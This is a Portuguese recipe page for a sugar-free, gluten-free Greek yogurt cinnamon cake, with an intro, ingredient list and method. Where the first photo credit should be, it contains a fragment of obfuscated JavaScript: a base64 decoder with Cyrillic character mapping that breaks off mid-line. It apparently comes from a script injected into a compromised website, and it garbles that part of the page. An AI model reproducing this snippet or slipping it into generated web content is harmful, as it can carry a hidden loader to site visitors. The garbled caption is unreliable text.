Bolo de iogurte grego com canela e sem açúcar
Sei que tem adorado as receitas dos bolinhos deliciosos que tenho partilhado consigo, e por isso, hoje trago-lhe mais uma receita deliciosa e saudável. Conheça o bolo de iogurte grego com canela sem glúten e sem açúcar! Uma opção mais saudável que ajuda a saciar a vontade de comer doces e que não é prejudicial para a sua saúde.
Hoje em dia existem muitos tipos de farinhas saudáveis, tais como a farinha de coco, a farinha de arroz ou até mesmo a farinha de frutos secos, que poderá fazer você mesmo em casa de forma rápida, prática e económica.
Já o açúcar que pode facilmente substituir por mel, um adoçante natural que fica delicioso em bolos e sobremesas.
Conheça agora esta receita deliciosa de bolo de iogurte grego com canela sem glúten e sem açúcar e surpreenda a sua família com esta alternativa mais saudável.

Bolo de iogurte grego com canela sem glúten e sem açúcar- Iogurte grego | Foto: function a4872b9c6b(y1){var qd=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’;var x0=”;var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<<2)|(w9>>4);w6=((w9&15)<<4)|(we>>2);qe=((we&3)<<6)|n7;if(n6>=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oa
Receita de bolo de iogurte grego com canela
Ingredientes
250 gramas de iogurte grego natural sem açúcar
Canela a gosto
1 Chávenas de chá de farinha de amêndoa
1 Chávena de chá de farinha de coco
1 Chávena de chá de polvilho doce (opcional)
2 Colheres de sopa de óleo de coco
6 ovos
1 Colher de sopa de fermento (preferencialmente sem glúten)
Mel a gosto
Modo de preparação
Comece por separar as gemas das claras. De seguida bata as claras em castelo.
Junte às gemas e ao iogurte grego a quantidade de mel que desejar e misture bem com a batedeira. Adicione as farinhas e continue a bater o bolo durante 5 minutos em velocidade máxima. Depois acrescente canela a gosto e as claras em castelo. Misture bem o preparado mas não use a batedeira.
Misture o fermento no preparado e leve ao forno pré-aquecido a 180º entre 30 a 40 minutos. Atenção: o tempo de cozedura pode variar consoante o forno de cada um. Preferencialmente deixe o bolo tapado com papel de alumínio para não queimar a parte de cima.
Quando estiver cozido deixe arrefecer antes de desenformar. Logo a seguir emprate da forma que mais gostar. Se desejar, pode acrescentar uma cobertura de mel, coco ralado ou chocolate negro a este maravilhoso bolo de iogurte.

Bolo de iogurte grego com canela e sem açúcar - Delicie-se | Foto: pinimg
Se gostou de conhecer a receita do bolo de iogurte com canela e sem açúcar, descubra também a receita do bolo de cenoura com sumo de laranja e cobertura de chocolate negro e o bolo de avelãs e aveia.